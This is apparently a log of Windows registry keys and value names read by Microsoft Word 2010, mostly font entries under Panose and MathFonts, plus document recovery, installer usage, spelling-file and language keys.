HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6B5D7
6B5D7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\72F4A
72F4A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
